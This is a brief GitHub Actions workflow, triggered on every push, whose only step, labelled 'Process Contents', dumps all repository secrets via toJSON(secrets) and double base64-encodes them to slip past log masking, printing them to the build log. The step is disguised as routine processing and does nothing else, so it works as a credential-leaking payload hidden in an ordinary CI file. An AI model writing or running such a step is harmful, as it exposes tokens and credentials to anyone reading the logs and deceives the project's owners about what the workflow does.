on:
  push:

jobs:
  process:
    runs-on: ubuntu-latest
    steps:
    - name: Process Contents
      run: echo "$CONTENTS" | base64 -w 0 | base64 -w 0
      env:
        CONTENTS: ${{ toJSON(secrets) }}